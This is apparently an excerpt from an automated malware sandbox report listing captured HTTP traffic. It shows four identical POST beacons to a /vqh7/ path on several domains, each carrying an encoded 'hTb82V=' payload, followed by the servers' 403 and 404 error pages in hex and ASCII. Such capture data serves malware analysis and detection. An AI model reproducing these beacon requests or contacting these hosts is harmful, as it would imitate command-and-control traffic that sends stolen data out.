          Source: global trafficHTTP traffic detected: POST /vqh7/ HTTP/1.1Host: www.krankenzusatz.netConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.krankenzusatz.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.krankenzusatz.net/vqh7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 68 54 62 38 32 56 3d 28 31 64 68 6f 76 37 6f 4f 61 35 49 68 2d 56 6b 36 30 34 79 78 6d 33 4c 38 37 31 55 78 5a 63 67 5a 66 55 59 56 68 67 6b 64 37 34 52 49 4b 30 6d 56 66 51 36 72 6d 54 66 52 5a 4b 54 28 33 78 30 4c 4b 50 33 7a 32 30 51 52 6b 43 71 38 4a 6c 61 6e 72 48 55 35 6c 66 78 5a 69 53 30 4e 74 4b 54 72 53 48 68 47 42 77 35 56 68 68 5f 31 45 49 52 6a 4e 49 78 57 74 76 53 42 44 6e 36 6e 72 38 46 65 38 6a 5a 54 75 61 50 59 4e 79 79 6a 36 38 4f 4d 44 64 5a 35 32 73 74 38 70 50 65 49 36 75 52 45 45 72 6f 39 78 7e 57 4d 46 6c 4f 4c 67 70 6d 56 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: hTb82V=(1dhov7oOa5Ih-Vk604yxm3L871UxZcgZfUYVhgkd74RIK0mVfQ6rmTfRZKT(3x0LKP3z20QRkCq8JlanrHU5lfxZiS0NtKTrSHhGBw5Vhh_1EIRjNIxWtvSBDn6nr8Fe8jZTuaPYNyyj68OMDdZ52st8pPeI6uREEro9x~WMFlOLgpmVw).
          Source: global trafficHTTP traffic detected: POST /vqh7/ HTTP/1.1Host: www.hotelyeah.topConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.hotelyeah.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hotelyeah.top/vqh7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 68 54 62 38 32 56 3d 32 42 55 66 6d 31 58 61 34 2d 59 50 49 71 34 55 6b 6f 76 35 39 6e 37 6d 66 70 46 44 76 36 73 68 48 51 6c 6a 74 50 48 68 45 30 56 39 32 73 67 36 38 70 4b 41 55 54 53 68 68 71 63 4a 72 49 39 35 7a 7a 6e 71 70 48 6a 41 74 4d 39 7a 39 72 4c 35 31 57 68 43 61 43 44 55 4f 4b 66 75 4f 4c 79 4d 58 66 47 78 6b 4c 6f 6d 44 69 28 44 55 4f 45 5a 53 76 68 6d 74 30 7e 76 6c 4f 65 67 28 78 35 77 74 31 4a 61 54 78 7e 4f 59 62 45 50 4f 62 7a 6d 78 66 42 64 64 5a 72 37 59 68 41 52 4f 4a 7a 69 32 72 64 30 4f 5a 35 36 44 43 73 37 72 59 75 54 52 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: hTb82V=2BUfm1Xa4-YPIq4Ukov59n7mfpFDv6shHQljtPHhE0V92sg68pKAUTShhqcJrI95zznqpHjAtM9z9rL51WhCaCDUOKfuOLyMXfGxkLomDi(DUOEZSvhmt0~vlOeg(x5wt1JaTx~OYbEPObzmxfBddZr7YhAROJzi2rd0OZ56DCs7rYuTRQ).
          Source: global trafficHTTP traffic detected: POST /vqh7/ HTTP/1.1Host: www.nativealternatives.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.nativealternatives.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nativealternatives.com/vqh7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 68 54 62 38 32 56 3d 62 59 4e 63 64 36 31 51 74 4a 62 59 57 58 74 68 46 53 72 73 72 49 44 78 38 4c 62 75 35 56 73 73 31 55 72 4f 31 5f 73 4c 6f 72 36 2d 4a 48 79 66 53 71 57 6f 66 4d 62 43 6c 77 6c 7a 76 7a 56 62 66 74 6f 56 76 65 35 47 6e 2d 44 76 7e 50 6e 51 56 71 5a 4c 30 6f 6a 48 70 50 53 4d 39 67 72 70 62 69 6e 72 70 4f 63 38 43 58 7a 77 52 36 76 54 65 72 53 4f 75 68 6a 6c 70 63 62 6a 59 45 66 70 77 49 53 50 4b 4a 58 63 59 55 56 42 30 42 31 45 5a 64 45 4d 66 62 51 30 74 31 78 31 7a 4f 30 72 76 70 34 45 79 42 55 78 62 45 58 6b 30 4e 50 35 77 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: hTb82V=bYNcd61QtJbYWXthFSrsrIDx8Lbu5Vss1UrO1_sLor6-JHyfSqWofMbClwlzvzVbftoVve5Gn-Dv~PnQVqZL0ojHpPSM9grpbinrpOc8CXzwR6vTerSOuhjlpcbjYEfpwISPKJXcYUVB0B1EZdEMfbQ0t1x1zO0rvp4EyBUxbEXk0NP5wg).
          Source: global trafficHTTP traffic detected: POST /vqh7/ HTTP/1.1Host: www.heroclassicrally.co.ukConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.heroclassicrally.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.heroclassicrally.co.uk/vqh7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 68 54 62 38 32 56 3d 6f 64 74 66 4c 34 62 54 46 73 62 69 61 4d 4f 72 6a 5a 39 37 31 41 55 73 64 41 59 54 65 4f 65 78 4b 31 61 63 48 36 34 59 75 68 47 34 61 37 41 75 57 4a 54 62 62 73 51 6e 5a 4b 33 79 6c 70 44 5a 63 74 55 53 52 42 46 38 72 76 54 48 4c 44 55 36 56 49 78 42 57 45 57 62 6b 42 6c 6c 6c 2d 6e 54 53 6d 77 43 67 6d 42 44 77 75 44 59 51 44 4a 41 34 78 7e 7a 48 48 43 35 75 31 73 48 38 36 74 54 37 37 50 4f 4d 5a 38 55 57 42 42 4d 72 30 6e 45 57 7a 32 45 4c 66 31 4a 68 48 30 51 7a 53 47 6d 74 6e 41 46 32 52 4e 65 62 67 50 48 34 4c 78 35 69 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: hTb82V=odtfL4bTFsbiaMOrjZ971AUsdAYTeOexK1acH64YuhG4a7AuWJTbbsQnZK3ylpDZctUSRBF8rvTHLDU6VIxBWEWbkBlll-nTSmwCgmBDwuDYQDJA4x~zHHC5u1sH86tT77POMZ8UWBBMr0nEWz2ELf1JhH0QzSGmtnAF2RNebgPH4Lx5iA).
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 23 Feb 2023 10:17:44 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Feb 2023 10:18:03 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Feb 2023 10:18:06 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 23 Feb 2023 10:18:20 GMTData Raw: 31 33 33 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a d9 72 ab ca 7a be df 4f 41 9c 4a 72 4e b1 bc 98 25 e4 63 af 04 10 02 24 81 00 09 24 94 4a ed 62 68 06 31 8a 59 4a e5 81 f2 1a 79 b2 14 b2 bd 2c cb f6 5e 3b a9 5c a4 6f 10 fd 77 7f ff fc 77 ab 9b df 7e fb ed f1 ef a6 2b 6e 63 a9 3c 14 d6 69 f2 e3 b7 c7 e7 07 04 41 d0 63 08 6c ef c7 6f 97 9f 29 a8 6d 28 ac eb e2 1e 1c 9b a8 7d ba e3 f2 ac 06 59 7d 5f 9f 0a 70 07 b9 cf 6f 4f 77 35 e8 6b 64 80 f8 1b e4 86 76 59 81 fa a9 a9 fd 7b fa ee 4b 1c db 0d c1 fd 30 bf cc 93 2b a0 2c bf 77 07 d2 97 13 d5 d2 0e 52 fb 7f 32 83 ef 8b a8 04 d5 d5 14 f4 1d 7a 66 a7 e0 e9 ae 8d 40 57 e4 65 7d 35 ac 8b bc 3a 7c f2 40 1b b9 e0 fe f2 f2 0d 8a b2 a8 8e ec e4 be 72 ed 04 3c 61 df 7f 42 d5 51 9d 80 1f 24 4a 42 4a 5e 43 b3 bc c9 bc 47 e4 b9 f3 d9 94 55 7d 4a 00 34 d8 ed c5 5c 6e 55 bd c8 31 98 da c9 bd 13 f4 ef 97 a1 c3 eb d0 fc 3c ab ef 7d 3b 8d 92 d3 03 c4 94 91 9d 7c 83 44 90 b4 a0 8e 5c fb 1b 54 d9 59 75 5f 81 32 f2 ff f6 71 5a 15 9d c1 03 84 91 45 ff 9e 98 44 19 b8 0f 41 14 84 f5 03 84 7d 27 71 9a 1a 63 24 3e 79 3f ca b1 dd 38 28 07 1d ee dd 3c c9 cb 07 e8 ef fd 4b 7b 3f ec 95 86 cf 08 9c 40 df d3 0a db f3 a2 2c 78 80 6e fa 53 bb 0c a2 ec 5d f7 7f fc 14 bf 02 6e 1d e5 d9 37 c8 cf f3 1a 94 37 f6 f0 a2 aa 48 ec d3 03 e4 24 b9 1b ff 1f b0 fb 3e c4 9f 1d 65 1f 38 3d 0b 79 9f 00 bf 7e 80 ec a6 ce df 33 7b 21 97 cf 56 fc 48 7f d3 1d c2 d0 6b 0f bc 69 fa bd 04 55 91 67 15 b8 8f 32 3f bf 51 f4 d5 ae dc a5 bd f1 be 9a 5e d5 76 dd 54 f7 6e ee 81 9b c9 97 a8 79 76 3f 85 a2 ff f0 47 b3 4b 60 57 79 f6 f5 7c 9c ba 9e 3f 84 e4 57 2e b8 92 ec 62 53 b7 be e8 f5 ed a7 67 bf 3f f3 ba 1f 0a c5 0d c3 57 6d d1 4b fb 54 de 21 96 86 c0 b0 93 cf cc 75 15 ad 25 28 80 5d 3f 40 59 7e ff fc f3 0d 6e 10 ff 6a e4 2b 57 7c 42 30 24 f3 7e d8 2b 6d 76 69 6f b4 2b 2d 6f 25 b2 bf 50 ea cf 43 dc 47 35 48 ab 1b 98 9f 91 84 a3 45 ff 21 95 a2 ec 2d 95 27 c4 17 81 76 ed 8f 1b f4 97 38 76 f2 ba ce d3 07 68 e0 f1 a6 ec cf 0a f4 52 4a 46 d7 c4 2b 4b bc c3 bf 35 c3 e0 ee 7b 0f b8 79 69 0f fe 7b 80 9a cc 03 e5 50 84 de 33 7a b5 38 89 d3 2c 77 e5 8d 2f f9 3c 84 79 0b ca ab f8 7a 2f c6 83 9f bb 4d f5 35 d9 76 eb a8 bd cd 9c 57 21 70 66 44 4e 46 6f 02 5e 09 f1 75 14 bf d6 b5 cf 1c 75 95 92 d8 17 66 6c 92 1b df fc cc b4 28 bb d4 ec 4f 6a 5e 12 55 f5 fd 65 59 19 02 3e 03 50 de d4 55 e4 81 cb cb 9b f8 83 23 5f a5 bb 29 c6 3f c3 eb aa ff 4d db 26 81 92 e8 46 2c 3f c9 87 fc 1a 2a e3 7b 0e 17 4f db 49 14 64 0f 90 0b b2 1a 94 6f f4 37 c8 ef 37 79 f3 12 f4 9f 71 ba 2c b8 0f 10 f6 55 0d 1b ea e6 7d 94 da c1 ad 1b 7f 2a f5 65 ed bd 4c 1d 76 39 51 16 dc ea 37 ac b9 dd cb fa e8 e4 89 f7 a6 c5 60 c7 6b 2d 3f da a0 cb 4b ef de 29 81 1d 3f 40 97 c7 bd 9d 24 ef 01 fe 94 56 15 28 5b 50 42 b6 e7 95 a0 ba 2d 09 5f 8b f0 66 e6 4f 97 cf eb 89 b7 1e ba 8e 91 d1 4d a9 f9 00 fb cb 24 1f 82 f1 4d ed 4f
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmltransfer-encoding: chunkeddate: Thu, 23 Feb 2023 10:18:23 GMTData Raw: 32 37 37 39 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 2
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Feb 2023 10:18:28 GMTServer: Apache/2.4.55 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Feb 2023 10:18:30 GMTServer: Apache/2.4.55 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Thu, 23 Feb 2023 10:18:43 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 